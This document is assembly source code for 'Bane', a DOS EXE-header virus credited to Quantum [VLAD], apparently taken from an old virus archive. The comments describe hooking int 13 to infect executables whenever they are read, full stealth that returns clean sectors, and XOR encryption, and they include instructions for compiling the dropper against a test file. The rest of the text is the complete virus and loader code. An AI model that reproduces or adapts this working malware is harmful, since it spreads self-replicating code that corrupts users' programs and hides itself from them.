home *** CD-ROM | disk | FTP | other *** search
- ;
- ; "Bane" - by Quantum [VLAD]
- ;
- ; Summary: This is an Exe Header virus that has
- ; int 13 infection and full stealth
- ; oh.. and just a little encryption :)
- ;
- ; Details: The virus code is a mere 256 bytes so it is optimised to shit,
- ; and squeezed into the exe header at offset 100h .. the cs:ip is then
- ; pointed to this code and the header length shortened by 100h bytes..
- ; once we have execution the resident code is shoved in above the int
- ; table at 20:0 and int 13 pointed to it.. after restoring all the reg's
- ; we jump to ALMOST the original cs:ip.. (cs+10h:ip) where the host goes
- ; on its way none the wiser.. as for the resident routine.. you may be
- ; thinking all those pushes and pops are unnecessary.. you're wrong..
- ; we check for a sector read.. if found we look to see if it's an exe and
- ; if it's infected (tag: 10000000 in offset 12h) if not we infect it.. if
- ; so we full stealth it .. after infecting it we re-write the sector (see
- ; notes below) and then full stealth the sector we just infected!
- ;
- ; Testing/Compiling: This is a dropper written in A86.. make yourself
- ; a little test executable called funnily enough "Test.exe" then compile
- ; and run this source.. The test exe is now infected.. run it and any
- ; read on a exe (including execute/streams/FCB's/etc) will infect that
- ; exe.. but you won't know about it.. 'cause the "clean" sector will be
- ; passed back to the reader.. The virus installation code will never
- ; be run twice.. therefore there is no need for a residency checker..
- ;
- ; Known/Possible Bugs: Does not check to see if the exe header is standard
- ; and thus will overwrite the bottom half of pklited exe headers..
- ; also smart drive (bah!) has a habit of caching it's write to sectors and
- ; not acknowledging them.. thus the full stealth still works when smartdrv
- ; is running but no more files will be infected.. to make matters worse..
- ; even if you turn off write caching smartdrv still screws around with the
- ; writes.. them's the breaks..
- ;
- ; Dedication: This virus is dedicated to a loser I used to know.. this guy
- ; was so lame he faked a robbery on his own house as an insurance scam and
- ; stashed his puter at a mates place. When it went sour and the insurance
- ; wouldnt pay him (like usual) he accused his friend of stealing his
- ; computer and ran to the cops.. a few months later they all went to court
- ; and my friend proved his innocence and the loser got charged with fraud
- ; and the judge awarded my friend the computer as compensation.
-
- ; -------------- This is the Loader (Just Ignore it) -----------------------
-
- mov ax,virend-virstart ; I use this to keep my code under 100h bytes
-
- push cs
- push cs
- pop ds
- pop es
-
- mov ax,03d02h
- mov dx,offset fname
- int 21h
-
- xchg bx,ax
-
- mov ah,3fh
- mov si,offset buffer
- mov dx,si
- mov cx,200h
- int 21h
-
- push si
- add si,14h
- mov di,offset nip
- movsw
- movsw
- add word [di-2],10h
- pop si
-
- sub word [si+8h],10h
-
- mov word [si+12h],10h
-
- push si
- mov di,si
- add di,14h
- xor ax,ax
- stosw
- stosw
- add di,100h - 18h
- mov si,offset virstart
- mov cx,virend-virstart
- rep movsb
- pop si
-
- mov ax,04200h
- xor cx,cx
- cwd
- int 21h
-
- mov ah,40h
- mov cx,200h
- mov dx,si
- int 21h
-
- mov ah,3eh
- int 21h
-
- int 20h
-
- ; --------------- Virus starts here (Pay Attention) ------------------------
-
- virstart:
-
- push ax
-
- push cs
- push cs
- pop ds
- pop es
- mov di,encstart-virstart
- call encdecrypt
- jmp encstart
- encbyte: db 0
-
- encdecrypt:
- mov ah,[encbyte-virstart]
- mov si,encstart-virstart
- mov cx,100h-(encstart-virstart)
- encloop:
- lodsb
- xor al,ah
- stosb
- loop encloop
- ret
-
- nip dw 0000h ; new ip
- ncs dw 0000h ; new cs
-
- encstart:
-
- in al,40h
- mov [encbyte-virstart],al
-
- mov ds,cx
-
- mov si,013h * 4
- push si
- mov di,offset old13i - virstart
- movsw
- movsw
-
- push ds
- pop es
-
- pop di
- mov ax,offset newint13 - virstart
- stosw
- mov ax,020h
- stosw
-
- push cs
- pop ds
-
- xor si,si
- mov di,200h
- mov cx,0100h
- rep movsb
-
- push cs
- pop ax
-
- add [offset ncs - virstart],ax
-
- mov ah,0dh
- int 21h
-
- pop ax
-
- xor dx,dx
-
- jmp dword ptr cs:[nip-virstart]
-
- db "[Bane]"
-
- newint13:
-
- cmp ah,2
- jz infect
-
- db 0eah
- old13i dw 0
- old13s dw 0
-
- infect:
-
- push si
- push di
- push ds
- push cx
- push es
- push bx
- push ax
-
- pushf
- call dword ptr cs:[offset old13i-virstart]
- mov cs:[orgax-virstart],ax
- jc nogood
- jmp tisok
- nogood2me: clc
- nogood:
- pop ax
- pop bx
- pop es
- pop cx
- pop ds
- pop di
- pop si
- mov ax,cs:[orgax-virstart]
- retf 2
- tisok:
-
- cld
-
- push es
- pop ds
-
- cmp word ptr [bx],"ZM"
- jnz nogood2me
- mov ax,10h
- cmp word ptr [bx+12h],ax
- jz dostealth
-
- mov word ptr [bx+12h],ax
-
- push cs
- pop es
-
- lea si,[bx + 14h]
- push si
- mov di,offset nip - virstart
- add word ptr [si+2],ax
- movsw
- movsw
-
- sub word ptr [bx+8h],ax
-
- push ds
- pop es
- pop di
-
- xor ax,ax
- stosw
- stosw
-
- push cs
- pop ds
-
- xor si,si
- lea di,[bx+100h]
- mov cx,encstart-virstart
- rep movsb
-
- call encdecrypt
-
- pop ax
- pop bx
- pop es
- pop cx
- push cx
- push es
- push bx
- push ax
-
- mov ah,3
- pushf
- call dword ptr [offset old13i - virstart]
-
- push es
- pop ds
-
- dostealth:
-
- push ds
- pop es
-
- lea si,[bx+ (offset nip - virstart)+100h]
- lea di,[bx+14h]
- mov ax,10h
- sub word ptr [si+2],ax
- movsw
- movsw
-
- add word ptr [bx+8h],ax
-
- xor ax,ax
- mov si,100h
- lea di,[bx+si]
- xchg cx,si
- rep stosb
-
- jmp nogood2me
-
- orgax:
-
- virend:
-
- ; ------------------------ End of Virus ------------------------------------
-
- fname db "test.exe",0
- buffer:
-
- ; ------------------------ End of Loader -----------------------------------
-
-
